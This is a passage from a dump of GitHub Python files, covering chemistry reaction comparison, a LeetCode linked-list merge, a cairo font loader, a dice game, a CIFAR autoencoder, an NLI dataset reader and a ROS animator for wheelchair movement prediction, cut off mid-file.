is_equivalent(\n self,\n reaction: \"Reaction\",\n both_directions: bool = False,\n ) -> bool:\n \"\"\"\n Check if the reaction is equivalent to the given reaction.\n\n Args:\n reaction (Reaction): The reaction to compare.\n both_directions (bool, optional): Whether to check both directions. Defaults to ``False``.\n\n Returns:\n bool: Whether the reaction is equivalent to the given reaction.\n \"\"\"\n equiv = is_equivalent_reaction(self, reaction)\n\n if both_directions and not equiv:\n tmp_reaction = self.get_reverse_reaction()\n equiv = is_equivalent_reaction(tmp_reaction, reaction)\n\n return equiv\n","repo_name":"xiaoruiDong/RDMC","sub_path":"rdmc/reaction.py","file_name":"reaction.py","file_ext":"py","file_size_in_byte":18183,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"47"} +{"seq_id":"22396510834","text":"#Name: Nick Bear\n#Date: 5/21/2023\n#Assignment: Merge K Sorted Lists\n\n# Definition for singly-linked list.\n# class ListNode:\n# def __init__(self, val=0, next=None):\n# self.val = val\n# self.next = next\nclass MergeKLists:\n def mergeKLists(self, lists: List[Optional[ListNode]]) -> Optional[ListNode]:\n\n #if the list is empty, return null\n if not lists or len(lists) == 0:\n return None\n\n #while there are k lists where k > 1\n while len(lists) > 1:\n\n #create an empty temp variable\n mergedList = []\n\n #for every other list in lists, merge it and its neighbor and then add it to the temp variable\n for i in range(0, len(lists), 2):\n l1 = lists[i]\n l2 = lists[i + 1] if i+1 < len(lists) else None\n mergedList.append(self.mergeList(l1, l2))\n \n #update lists variable to hold newly sorted lists cut in half\n lists = mergedList\n\n return lists[0]\n\n \n #LeetCode Easy Merge List function\n def mergeList(self, l1, l2):\n ans = ListNode()\n curr = ans\n\n while(l1 and l2):\n if (l1.val > l2.val):\n curr.next = l2\n l2 = l2.next\n else:\n curr.next = l1\n l1 = l1.next\n\n curr = curr.next\n \n if(l1):\n curr.next = l1\n \n if(l2):\n curr.next = l2\n \n return 
ans.next\n","repo_name":"NicholasBear97/leetcode-solutions","sub_path":"LinkedList/MergeKLists.py","file_name":"MergeKLists.py","file_ext":"py","file_size_in_byte":1499,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"14100117748","text":"\"\"\"\n http://cairographics.org/freetypepython/\n\"\"\"\n\nimport ctypes\nimport cairo\n\nCAIRO_STATUS_SUCCESS = 0\nFT_Err_Ok = 0\n\nclass PycairoContext(ctypes.Structure):\n _fields_ = [('PyObject_HEAD', ctypes.c_byte * object.__basicsize__),\n ('ctx', ctypes.c_void_p),\n ('base', ctypes.c_void_p)]\n\nclass FontLoader(object):\n \"\"\"docstring for FontLoader\"\"\"\n\n _freetype_so = None\n _cairo_so = None\n _ft_lib = None\n _surface = None\n\n def __init__(self):\n super(FontLoader, self).__init__()\n\n # find shared objects\n self._freetype_so = ctypes.CDLL ('libfreetype.so.6')\n self._cairo_so = ctypes.CDLL ('libcairo.so.2')\n\n self._cairo_so.cairo_ft_font_face_create_for_ft_face.restype = ctypes.c_void_p\n self._cairo_so.cairo_ft_font_face_create_for_ft_face.argtypes = [ ctypes.c_void_p, ctypes.c_int ]\n self._cairo_so.cairo_set_font_face.argtypes = [ ctypes.c_void_p, ctypes.c_void_p ]\n self._cairo_so.cairo_font_face_status.argtypes = [ ctypes.c_void_p ]\n self._cairo_so.cairo_status.argtypes = [ ctypes.c_void_p ]\n\n # initialize freetype\n self._ft_lib = ctypes.c_void_p ()\n if FT_Err_Ok != self._freetype_so.FT_Init_FreeType (ctypes.byref (self._ft_lib)):\n raise RuntimeError('Error initialising FreeType library.')\n\n self._surface = cairo.ImageSurface (cairo.FORMAT_A8, 0, 0)\n\n def cairo_font_face_from_file(self, filename, faceindex=0, loadoptions=0):\n # create freetype face\n ft_face = ctypes.c_void_p()\n cairo_ctx = cairo.Context (self._surface)\n cairo_t = PycairoContext.from_address(id(cairo_ctx)).ctx\n\n if FT_Err_Ok != self._freetype_so.FT_New_Face (self._ft_lib, filename, faceindex, ctypes.byref(ft_face)):\n raise Exception('Error creating FreeType font face for ' + filename)\n\n # create cairo font face for freetype face\n cr_face = self._cairo_so.cairo_ft_font_face_create_for_ft_face (ft_face, loadoptions)\n if CAIRO_STATUS_SUCCESS != self._cairo_so.cairo_font_face_status (cr_face):\n raise Exception('Error creating cairo font face for ' + filename)\n\n self._cairo_so.cairo_set_font_face (cairo_t, cr_face)\n if CAIRO_STATUS_SUCCESS != self._cairo_so.cairo_status (cairo_t):\n raise Exception('Error creating cairo font face for ' + filename)\n\n face = cairo_ctx.get_font_face ()\n\n return face\n\ndef example():\n \"\"\"\n Example font loading.\n \"\"\"\n face = FontLoader().cairo_font_face_from_file('df9/assets/fonts/ProFontWindows.ttf', 0)\n\n surface = cairo.ImageSurface(cairo.FORMAT_ARGB32, 128, 128)\n\n ctx = cairo.Context(surface)\n\n ctx.set_font_face(face)\n ctx.set_font_size(30)\n ctx.move_to(0, 44)\n ctx.show_text('Hello,')\n\n ctx.move_to(30, 74)\n ctx.show_text('world!')\n\n del ctx\n\n surface.write_to_png('hello.png')\n","repo_name":"thorsummoner/opendf9","sub_path":"df9/fontloader.py","file_name":"fontloader.py","file_ext":"py","file_size_in_byte":2904,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"43011150987","text":"import random\nimport time\nimport turtle\n### INIT OUR DICE ###\nscreen = 
turtle.Screen()\nscreen.addshape(\"dice01.gif\")\nscreen.addshape(\"dice02.gif\")\nscreen.addshape(\"dice03.gif\")\nscreen.addshape(\"dice04.gif\")\nscreen.addshape(\"dice05.gif\")\nscreen.addshape(\"dice06.gif\")\ndie01 = turtle.Turtle()\ndie02 = turtle.Turtle()\ndie03 = turtle.Turtle()\ndie04 = turtle.Turtle()\ndie05 = turtle.Turtle()\ndie06 = turtle.Turtle()\ndie01.hideturtle()\ndie02.hideturtle()\ndie03.hideturtle()\ndie04.hideturtle()\ndie05.hideturtle()\ndie06.hideturtle()\ndie01.shape(\"dice01.gif\")\ndie02.shape(\"dice02.gif\")\ndie03.shape(\"dice03.gif\")\ndie04.shape(\"dice04.gif\")\ndie05.shape(\"dice05.gif\")\ndie06.shape(\"dice06.gif\")\n\n### INSTRUCTION ###\nprint(\"Let's throw some dice!\")\n\nwhile True: #game runs until player choses presses the \"n\" key\n print(\"Throwing...\")\n #a short delay before the toss\n time.sleep(2)\n \n #random number between 1 and 6\n #does not count 7\n die_face = random.randrange(1,7)\n print(\"You rolled a \" + str(die_face))\n \n #### SHOW DIE FACES ####\n if die_face == 1:\n die01.showturtle()\n elif die_face == 2:\n die02.showturtle()\n elif die_face == 3:\n die03.showturtle()\n elif die_face == 4:\n die04.showturtle()\n elif die_face == 5:\n die05.showturtle()\n else:\n die06.showturtle()\n \n #CONTINUE?\n cont = input(\"Do you want to play again? y/n: \")\n if cont == \"n\":\n print(\"Quiting Game Now...\")\n quit()\n elif cont == \"y\":\n die01.hideturtle()\n die02.hideturtle()\n die03.hideturtle()\n die04.hideturtle()\n die05.hideturtle()\n die06.hideturtle()\n else:\n while cont != \"y\" or \"n\":\n print(\"Error: Press y/n: \")\n cont = input(\"Do you want to play again? y/n: \")\n if cont == \"n\":\n print(\"Quiting Game Now...\")\n quit()\n elif cont == \"y\":\n die01.hideturtle()\n die02.hideturtle()\n die03.hideturtle()\n die04.hideturtle()\n die05.hideturtle()\n die06.hideturtle()\n break\n else:\n continue\n\n","repo_name":"The-Grey-Wizard/Python_Dice_Game","sub_path":"dicegame.py","file_name":"dicegame.py","file_ext":"py","file_size_in_byte":2006,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"42643511295","text":"def aradd(arr,i,size):\n if i < size:\n print(\"element no :\",i)\n arr.append(int(input()))\n i += 1\n aradd(arr,i,size)\n \n return arr, max(arr)\n\n\narr = []\ni = 0\nsize = int(input(\"Enter array size? 
\"))\nlst, sm = aradd(arr,i,size)\nprint(lst)\nlst.sort()\nprint(\"Second lagest number of array is \",lst[len(lst)-2])\n#rint(large)\n#print(\"Second largest of Array \",lst,\" is \",max(lst.remove(int(max(lst)))))\n","repo_name":"Imalli5253/lbprogs","sub_path":"52.py","file_name":"52.py","file_ext":"py","file_size_in_byte":433,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"20576475664","text":"import numpy as np\nfrom sklearn.utils import shuffle\nfrom osm.data_streams.oracle.oracle import Oracle\n\n\nclass AvailabilityAwareOracle(Oracle):\n\n def __init__(self, availability: float, batch=False, min_labels=0) -> None:\n \"\"\"\n An Oracle that provides true labels based on its availability\n\n :param min_labels: The minimum number of labels the oracle must provide\n :param availability: Value indicates the availability of the Oracle.\n :param batch: True if the same oracle availability is considered for the entire batch.\n If False for each instance the oracle availability is considered\n \"\"\"\n\n if availability < 0 or availability > 1:\n raise ValueError(\"Availability: Out of range. Possible values: [0,1]\")\n super().__init__()\n self.availability = availability\n self.batch = batch\n self.min_samples = min_labels\n\n def predict(self, X):\n \"\"\"\n Get labels\n :param X: {array-like, dense matrix}, shape = [n_samples], the instances for which labels need to be obtained\n :return: {array-like, dense matrix}, shape = [n_samples], labels of the provided instances. np.nan if oracle\n is not available\n \"\"\"\n self.queried = len(X)\n to_query = []\n if self.batch:\n if self.is_available():\n to_query = X\n else:\n for index in X:\n if self.is_available():\n to_query.append(index)\n\n # if we do not satisfy the minimum number of instances required\n min_required = min(len(self.data), int(self.min_samples))\n if len(to_query) < min_required:\n additionally_required = min_required - len(to_query)\n additionally_required_data = shuffle(self.data.drop(to_query), n_samples=additionally_required)\n to_query.append(additionally_required_data.index.values)\n\n return super().predict(to_query)\n\n def is_available(self):\n \"\"\"\n Function to check the availability of the oracle\n :return: True if the oracle is available\n \"\"\"\n return np.random.uniform(0, 1) <= self.availability\n\n def get_name(self):\n return \"availability_aware_oracle\"\n","repo_name":"elrasp/osm","sub_path":"osm/data_streams/oracle/availability_aware_oracle.py","file_name":"availability_aware_oracle.py","file_ext":"py","file_size_in_byte":2257,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"47"} +{"seq_id":"3987837468","text":"import csv\nimport string\nfrom nltk.stem import *\nfrom sklearn.feature_extraction.text import CountVectorizer\nimport numpy as np\nimport pickle\nclass Data():\n\tdef __init__ (self, file, data_row, feature_row):\n\t\tself.file = file\n\t\tself.data_row = data_row\n\t\tself.feature_row = feature_row\n\t\tself.classified = {}\n\tdef extract(self):\n\t\twith open(self.file) as csv_file:\n\t\t\tcsv_reader = csv.reader(csv_file, delimiter=',')\n\t\t\tlable_list = []\n\t\t\tline_count = 0\n\t\t\tfor row in csv_reader:\n\t\t\t\tif line_count == 0:\n\t\t\t\t\tpass\n\t\t\t\telse:\n\t\t\t\t\tlable_list.append(row[self.feature_row])\n\t\t\t\tline_count += 1\n\t\t\tlable_list = set(lable_list)\n\t\t\tlable_list = list(lable_list)\n\t\t\tdata_lables = 
lable_list\n\t\t\tprint(data_lables)\n\t\twith open(self.file) as csv_file:\n\t\t\tcsv_reader = csv.reader(csv_file, delimiter=',')\n\t\t\tfor row in csv_reader:\n\t\t\t\tbinary = -1\n\t\t\t\tcounter_for_lables = 0\n\t\t\t\t#print(\"got here\")\n\t\t\t\t#print(len(data_lables))\n\t\t\t\tfor item in data_lables:\n\t\t\t\t\t#print(row[self.feature_row])\n\t\t\t\t\t#print(item)\n\t\t\t\t\tif row[self.feature_row] == item:\n\t\t\t\t\t\t#print(\"match\")\n\t\t\t\t\t\tbinary = counter_for_lables\n\t\t\t\t\tcounter_for_lables += 1\n\t\t\t\texclude = set(string.punctuation)\n\t\t\t\tremoved = ''.join(ch for ch in row[self.data_row] if ch not in exclude)\n\t\t\t\tremoved = removed.lower()\n\t\t\t\tremoved = removed.replace(\"\\n\\n\", \" \")\n\t\t\t\tremoved = removed.replace(\"\\n\", \" \")\n\t\t\t\tremoved = ' '.join(removed.split())\n\t\t\t\tstemmer = PorterStemmer()\n\t\t\t\tsplit = removed.split(\" \")\n\t\t\t\tstemmed = [stemmer.stem(item) for item in split]\n\t\t\t\tremoved = ' '.join(stemmed)\n\t\t\t\tif len(removed) >= 45 and binary != -1:\n\t\t\t\t\tself.classified[removed] = binary\n\t'''def vectorize(self):\n\t\tnew_dict = {}\n\t\tvectorizer = CountVectorizer()\n\t\twords = []\n\t\tfor item in self.classified:\n\t\t\twords.append(item)\n\t\tprint(\"making\")\n\t\tvectorizer.fit(words)\n\t\tprint(\"done making\")\n\t\tcounter = 0\n\t\tfor item in self.classified:\n\t\t\tprint(counter, end = \" \")\n\t\t\tprint(\"out of \", end = \" \")\n\t\t\tprint(len(self.classified))\n\t\t\tcounter += 1\n\t\t\tnew_dict[tuple(list(vectorizer.transform([item]).toarray().flatten()))] = self.classified[item]\n\t\tself.classified = new_dict\n\ndata = Data(\"short_lyrics.csv\", 5,4)\ndata.extract()\ndata.vectorize()\nresult = data.classified\nprint(result)\n#for item in result:\n#\tprint(np.sum(np.array(list(item))))\n\n'''","repo_name":"CarsonML/K-Nearest-Neighbors","sub_path":"preprocessor.py","file_name":"preprocessor.py","file_ext":"py","file_size_in_byte":2274,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"21108670566","text":"# imports\nimport os\nimport sys\n\ncwd = os.getcwd()\nsys.path.insert(0,cwd+'/..')\nimport time\nimport numpy as np\nimport pickle\nimport myssl\nimport matplotlib.pyplot as plt\nimport tensorflow as tf\n\nnp.random.seed(10)\n\nprint(\"Importing CIFAR\")\n\n#%%\ndef load_cfar10_batch(cifar10_dataset_folder_path, batch_id):\n with open(cifar10_dataset_folder_path + '/data_batch_' + str(batch_id), mode='rb') as file:\n # note the encoding type is 'latin1'\n batch = pickle.load(file, encoding='latin1')\n \n features = batch['data'].reshape((len(batch['data']), 3, 32, 32)).transpose(0, 2, 3, 1).reshape(((len(batch['data']))), 3*32*32)/255\n labels = batch['labels']\n \n return features, labels\n#%%\ndef normalize(x):\n \"\"\"\n argument\n - x: input image data in numpy array [32, 32, 3]\n return\n - normalized x \n \"\"\"\n min_val = np.min(x)\n max_val = np.max(x)\n x = (x-min_val) / (max_val-min_val)\n return x\n#%%\nclass cifar10loader():\n def __init__(self, path):\n \n self.data = np.zeros((0, 3*32*32))\n self.labels = np.zeros(0, dtype=int)\n self.size = 0\n \n n_batches = 5\n for batch_i in range(1, n_batches + 1):\n features, labels = load_cfar10_batch(path, batch_i)\n features = normalize(features)\n #labels = one_hot_encode(labels)\n self.data = np.concatenate((self.data, features), axis=0)\n self.labels = np.concatenate((self.labels, np.array(labels, dtype=int)), axis=0)\n self.size = self.labels.shape[0]\n 
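# (Illustrative aside: one_hot_encode() is referenced in a commented-out line
# inside cifar10loader above but is not defined anywhere in this file. A
# minimal sketch of such a helper -- an assumption, not the original code --
# for integer CIFAR-10 labels in [0, 10):)
import numpy as np  # already imported at the top; repeated so the sketch stands alone

def one_hot_encode(labels, n_classes=10):
    """Map integer class labels to one-hot rows, e.g. 3 -> a 1 at column 3."""
    labels = np.asarray(labels, dtype=int)
    encoded = np.zeros((len(labels), n_classes))
    encoded[np.arange(len(labels)), labels] = 1  # set one hot bit per row
    return encoded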
\ncifar = cifar10loader(cwd + '/../' + 'data/cifar-10-batches-py')\n\ntrain_data = cifar.data\ntrain_labels = cifar.labels + 1\n\ndef weight_variable(shape):\n initial = tf.truncated_normal(shape, stddev=0.1)\n return tf.Variable(initial)\n\ndef bias_variable(shape):\n initial = tf.constant(0.1, shape=shape)\n return tf.Variable(initial)\n\ndef fc_layer(prev, input_size, output_size):\n W = weight_variable([input_size, output_size])\n b = bias_variable([output_size])\n return tf.matmul(prev, W) + b\n\nREDUCED_SIZE = 50\n\ndef autoencoder(x):\n l1 = tf.nn.tanh(fc_layer(x, 32*32*3, 100))\n l2 = tf.nn.tanh(fc_layer(l1, 100, 100))\n l3 = fc_layer(l2, 100, REDUCED_SIZE)\n l4 = tf.nn.tanh(fc_layer(l3, REDUCED_SIZE, 100))\n l5 = tf.nn.tanh(fc_layer(l4, 100, 100))\n out = tf.nn.relu(fc_layer(l5, 100, 32*32*3))\n loss = tf.reduce_mean(tf.squared_difference(x, out))\n return loss, out, l3\n\nBATCH_SIZE = 32\n\nprint(\"Training Autoencoder\")\n\n\nwith tf.Session() as sess:\n x = tf.placeholder(tf.float32, shape=[None, 32*32*3])\n\n loss, output, latent = autoencoder(x)\n\n train_step = tf.train.AdamOptimizer(1e-4).minimize(loss)\n\n # run the training loop\n sess.run(tf.global_variables_initializer())\n for i in range(20000):\n t_size = train_data.shape[0]\n batch = train_data[np.random.permutation(np.arange(t_size))[:BATCH_SIZE], :]\n feed = {x : batch}\n if i % 500 == 0:\n print(\"Step: %d. \" % (i))\n train_step.run(feed_dict=feed, session=sess)\n\n\n\n\n\n print(\"Building reduced set\")\n\n train_data_reduced = np.zeros((train_data.shape[0], REDUCED_SIZE))\n Mlatent = sess.run([latent], feed_dict = {x: train_data})\n train_data_reduced = Mlatent[0]\n\nprint(\"Computing SSL\")\n\ndef test(m, s, p):\n data, labels = train_data_reduced[:1000, :], train_labels[:1000]\n hidlabs = myssl.hide_labels(labels,p)\n agr = myssl.SSLSolver()\n predlabels,_,_ = agr.fit(data, hidlabs, m, s, tuning_param=10.)\n print(labels[:20])\n print(predlabels[:20])\n score=0\n for i in range(len(labels)):\n if labels[i]==predlabels[i]:\n score+=1\n print(\"Score is {} out of {}\".format(score, len(labels)))\n\nstart = time.time()\ntest(100,50,50)\nprint(time.time()-start)\n\n\n\n\n\n\n\n\n\n","repo_name":"clemlal/Large-Graph-Construction-for-Scalable-Semi-Supervised-Learning-GRAPHSML-Project-MVA","sub_path":"src/examples/cifar_with_autoencoder.py","file_name":"cifar_with_autoencoder.py","file_ext":"py","file_size_in_byte":3854,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"47"} +{"seq_id":"28441680500","text":"from typing import Dict, Optional\nimport json\nimport logging\nfrom overrides import overrides\n\nfrom allennlp.common.file_utils import cached_path\nfrom allennlp.common.util import pad_sequence_to_length\nfrom allennlp.data.dataset_readers.dataset_reader import DatasetReader\nfrom allennlp.data.fields import Field, TextField, LabelField, MetadataField, ArrayField\nfrom allennlp.data.instance import Instance\nfrom allennlp.data.token_indexers import SingleIdTokenIndexer, TokenIndexer\nfrom allennlp.data.tokenizers import Tokenizer, SpacyTokenizer, PretrainedTransformerTokenizer\n\nlogger = logging.getLogger(__name__)\n\n\n@DatasetReader.register(\"doc_nli\")\nclass DocNliReader(DatasetReader):\n\n def __init__(\n self,\n tokenizer: Optional[Tokenizer] = None,\n token_indexers: Dict[str, TokenIndexer] = None,\n max_source_length: Optional[int] = 512,\n **kwargs,\n ) -> None:\n super().__init__(manual_distributed_sharding=True, **kwargs)\n self._tokenizer = tokenizer or 
SpacyTokenizer()\n if isinstance(self._tokenizer, PretrainedTransformerTokenizer):\n assert not self._tokenizer._add_special_tokens\n self._token_indexers = token_indexers or {\"tokens\": SingleIdTokenIndexer()}\n self.max_source_length = max_source_length\n\n @overrides\n def _read(self, file_path: str):\n file_path = cached_path(file_path)\n\n with open(file_path, \"r\") as doc_nli_file:\n doc_nli_examples = json.load(doc_nli_file)\n count = 0\n for example in doc_nli_examples:\n label = \"entail\" if example[\"label\"] == 'entailment' else \"not_entail\"\n # using the whole paragraph as premise or just the answering sent\n premise = example['premise']\n count += 1\n # if self.joint_training and count == 1000:\n # break\n hypothesis = example[\"hypothesis\"]\n instance = self.text_to_instance(premise,\n hypothesis,\n label,\n )\n if instance:\n yield instance\n\n @overrides\n def text_to_instance(\n self, # type: ignore\n premise: str,\n hypothesis: str,\n label: str = None,\n answer_score: float = None\n ) -> Instance:\n fields: Dict[str, Field] = {}\n premise = self._tokenizer.tokenize(premise)\n hypothesis = self._tokenizer.tokenize(hypothesis)\n tokens = self._tokenizer.add_special_tokens(premise, hypothesis)\n\n if len(tokens) > self.max_source_length:\n tokens = tokens[:self.max_source_length]\n fields[\"tokens\"] = TextField(tokens, self._token_indexers)\n\n metadata = {\n \"premise_tokens\": [x.text for x in premise],\n \"hypothesis_tokens\": [x.text for x in hypothesis],\n }\n fields[\"metadata\"] = MetadataField(metadata)\n\n if label:\n fields[\"label\"] = LabelField(label)\n\n return Instance(fields)\n","repo_name":"jifan-chen/subquestions-for-fact-checking","sub_path":"dataset_reader/doc_nli_reader.py","file_name":"doc_nli_reader.py","file_ext":"py","file_size_in_byte":3130,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"47"} +{"seq_id":"26558446475","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n# animator.py\n# Author: Ravi Joshi\n# Date: 2019/07/30\n\n# import modules\nimport os\nimport GPy\nimport rospy\nimport numpy as np\nfrom matplotlib import cm\nimport matplotlib.pyplot as plt\n#from matplotlib.ticker import MaxNLocator\n\n#plt.rcParams.update({'font.size': 18})\n\nstyle = 'seaborn'\nif style in plt.style.available:\n plt.style.use(style)\n\nfontsize = 16 # previously it was 14\nplt.rcParams.update({'font.size': fontsize,\n 'xtick.labelsize': fontsize,\n 'ytick.labelsize': fontsize,\n 'axes.labelsize': fontsize,\n 'legend.fontsize': fontsize,\n 'axes.titlesize': fontsize + 2,\n 'text.usetex': False})\n\nSTOP_FRAME = 166\n\nMAX_WHILL_MOVE = 10\nCURSOR_SIZE = 40\n\nwhill_from_latent = []\nwhill_from_joint = []\n\nproject_loc = '/home/ravi/ros_ws/src/baxter_whill_movement'\nfiles_dir = os.path.join(project_loc, 'files')\n\n\ndef save_data():\n header = 'movement'\n\n latent_file = os.path.join(files_dir, 'whill_from_latent.csv')\n joint_file = os.path.join(files_dir, 'whill_from_joint.csv')\n\n np.savetxt(latent_file, whill_from_latent, delimiter=',', fmt='%.6f', header=header, comments='')\n np.savetxt(joint_file, whill_from_joint, delimiter=',', fmt='%.6f', header=header, comments='')\n\n\nclass ModelPlayer():\n def __init__(self, model_file, max_points, timer_freq, dim1, dim2, resolution, manual):\n # load mrd model from pickle file\n self.mrd_model = GPy.load(model_file)\n\n mrd_X = self.mrd_model.X.mean\n self.mrd_point_count = mrd_X.shape[0]\n if self.mrd_point_count > max_points:\n print('Mean contains 
more samples. Shape: (%d, %d)' % mrd_X.shape)\n downsample_indices = np.random.choice(self.mrd_point_count, size=max_points, replace=False)\n mrd_X = mrd_X[downsample_indices]\n\n # parameters for doing latent function inference\n self.q_dim = mrd_X.shape[1]\n self.latent_X = np.zeros((1, self.q_dim))\n\n self.dim1 = dim1\n self.dim2 = dim2\n self.resolution = resolution\n\n self.mrd_X = mrd_X[:, [self.dim1, self.dim2]]\n\n title = 'Baxter Whill Movement using MRD'\n fig, (self.ax1, self.ax2) = plt.subplots(nrows=1, ncols=2, figsize=(10, 4))\n #self.ax2.xaxis.set_major_locator(MaxNLocator(integer=True))\n self.plot_latent_space()\n self.plot_whill_movement()\n fig.canvas.set_window_title(title)\n #self.text_handle = self.ax1.text(0.8, 0.1, 'Play Mode: OFF', horizontalalignment='center', verticalalignment='center', transform=self.ax1.transAxes, bbox={'facecolor':'green', 'alpha':0.5, 'pad':6})\n\n self.counter = 0\n self.whill_move_handle = None\n self.latent_cursor_handle = None\n\n if manual:\n #fig.suptitle('Predicted Whill movements are not sent to the Whill controller', fontstyle='italic', color='red')\n # variables for mouse cursor based motion\n self.mouse_xy = np.zeros((1, 2))\n self.start_motion = False\n self.cursor_color = 'red'\n\n # connect the cursor class\n fig.canvas.mpl_connect('button_press_event',self.mouse_click)\n fig.canvas.mpl_connect('motion_notify_event', self.mouse_move)\n fig.subplots_adjust(top=0.80)\n else:\n self.whill_move = None\n #self.init_ros_whillpy()\n self.cursor_color = 'green'\n #self.text_handle.set_text('Automatic Mode: ON')\n\n # create a timer to follow the mean trajectory\n self.ros_timer = rospy.Timer(rospy.Duration(1 / timer_freq), self.timer_callback)\n\n # adjust the space at the bottom\n #fig.subplots_adjust(bottom=0.15)\n fig.tight_layout()\n\n\n def spin(self):\n plt.show()\n\n\n def mouse_click(self, event):\n if not event.inaxes:\n return\n\n self.start_motion = ~self.start_motion\n '''\n if self.start_motion:\n #self.text_handle.set_text('Play Mode: ON')\n #self.text_handle.set_bbox({'facecolor':'red', 'alpha':0.5, 'pad':10})\n else:\n #self.text_handle.set_text('Play Mode: OFF')\n #self.text_handle.set_bbox({'facecolor':'green', 'alpha':0.5, 'pad':10})\n '''\n\n self.latent_cursor_handle.axes.figure.canvas.draw_idle()\n\n\n def update_whill_plot(self, time, whill_movement):\n self.ax2.scatter(time, whill_movement, marker='o', s=CURSOR_SIZE, color='green', alpha=0.3)\n if self.whill_move_handle is None:\n # initialize the plot handle if it is null\n self.whill_move_handle, = self.ax2.plot(time, whill_movement, color='green', linewidth=2, alpha=0.5)\n else:\n # update the cursor\n new_time = np.concatenate((self.whill_move_handle.get_xdata(), np.array((time), ndmin=1)))\n new_movement = np.concatenate((self.whill_move_handle.get_ydata(), np.array((whill_movement), ndmin=1)))\n self.whill_move_handle.set_xdata(new_time)\n self.whill_move_handle.set_ydata(new_movement)\n\n self.whill_move_handle.axes.figure.canvas.draw_idle()\n\n\n def update_latent_cursor(self, cursor):\n if self.latent_cursor_handle is None:\n self.latent_cursor_handle = self.ax1.scatter(cursor[0, 0], cursor[0, 1], marker='o', s=CURSOR_SIZE, color=self.cursor_color, alpha=0.5)\n else:\n new_offset = np.concatenate((self.latent_cursor_handle.get_offsets(), cursor))\n self.latent_cursor_handle.set_offsets(new_offset)\n\n self.latent_cursor_handle.axes.figure.canvas.draw_idle()\n\n\n def mouse_move(self, event):\n if not event.inaxes:\n return\n\n # get the current mouse 
cursor position\n cursor = np.array((event.xdata, event.ydata), ndmin=2)\n if np.linalg.norm(cursor - self.mouse_xy) < 0.05:\n return\n\n time = self.counter\n\n # increment the counter\n self.counter += 1\n\n # store the current mouse position\n self.mouse_xy = cursor.copy()\n\n self.update_latent_cursor(cursor)\n joint_angles = self.get_joint_angles(cursor)\n\n whill_movement = self.get_whill_movement(joint_angles)\n self.update_whill_plot(time, whill_movement)\n\n\n def timer_callback(self, data):\n cursor = self.mrd_X[self.counter]\n time = self.counter\n\n # increment the counter\n self.counter += 1\n\n # stop the timer if we have finished the trajectory\n if self.counter >= self.mrd_point_count:\n self.ros_timer.shutdown()\n rospy.loginfo('Trajectory finished')\n return\n\n # get the mean value of the current X\n cursor = np.array((cursor[0], cursor[1]), ndmin=2)\n\n self.update_latent_cursor(cursor)\n joint_angles = self.get_joint_angles(cursor)\n\n # whill movement predicted from 2D latent space\n whill_movement_latent = self.mrd_model.predict(self.latent_X, Yindex=1)\n # whill movement predicted from joint angles\n whill_movement = self.get_whill_movement(joint_angles)\n self.update_whill_plot(time, whill_movement)\n\n whill_from_latent.append(np.mean(whill_movement_latent[0]))\n whill_from_joint.append(whill_movement)\n\n # stop the timer if we have finished the trajectory\n if self.counter >= STOP_FRAME:\n self.ros_timer.shutdown()\n rospy.loginfo('Stop condition arrived')\n return\n\n\n def plot_latent_space(self, plot_inducing=False, plot_variance=True):\n x_min, y_min = self.mrd_X.min(axis=0)\n x_max, y_max = self.mrd_X.max(axis=0)\n x_r, y_r = x_max - x_min, y_max - y_min\n x_min -= 0.1 * x_r\n x_max += 0.1 * x_r\n y_min -= 0.1 * y_r\n y_max += 0.1 * y_r\n\n #self.ax1.scatter(self.mrd_X[:, 0], self.mrd_X[:, 1], marker='o', s=50, color='b', alpha=0.8, label='Train')\n #self.ax1.plot(self.mrd_X[:, 0], self.mrd_X[:, 1], color='blue', linewidth=2, alpha=0.8, label='Mean')\n\n if plot_variance:\n def get_variance(x):\n Xtest_full = np.zeros((x.shape[0], self.q_dim))\n Xtest_full[:, [self.dim1, self.dim2]] = x\n _, var = self.mrd_model.predict(np.atleast_2d(Xtest_full))\n var = var[:, :1]\n return -np.log(var)\n\n x, y = np.mgrid[x_min : x_max : 1j * self.resolution, y_min : y_max : 1j * self.resolution]\n grid_data = np.vstack((x.flatten(), y.flatten())).T\n grid_variance = get_variance(grid_data).reshape((self.resolution, -1))\n self.ax1.imshow(grid_variance.T, interpolation='bilinear', origin='lower', cmap=cm.gray, extent=(x_min, x_max, y_min, y_max))\n\n if plot_inducing:\n Z = self.mrd_model.Z\n self.ax1.scatter(Z[:, self.dim1], Z[:, self.dim2], color='white', s=CURSOR_SIZE, marker='^', alpha=0.6)\n\n self.ax1.set_xlim((x_min, x_max))\n self.ax1.set_ylim((y_min, y_max))\n\n self.ax1.grid(False)\n self.ax1.set_aspect('auto')\n #self.ax1.legend(loc='upper right')\n self.ax1.set_xlabel('Dimension %i' % self.dim1)\n self.ax1.set_ylabel('Dimension %i' % self.dim2)\n #self.ax1.title.set_text('Latent Space Visualization')\n\n\n def plot_whill_movement(self):\n self.ax2.grid(True)\n self.ax2.set_ylim((-1, MAX_WHILL_MOVE))\n self.ax2.set_xlabel('Timestamp')\n self.ax2.set_ylabel('Predicted Movement')\n #self.ax2.title.set_text('Whill Movement Visualization')\n\n\n def get_joint_angles(self, cursor):\n # update the latent variable X before prediction\n self.latent_X[0, self.dim1] = cursor[0, 0]\n self.latent_X[0, self.dim2] = cursor[0, 1]\n\n joint_angles = 
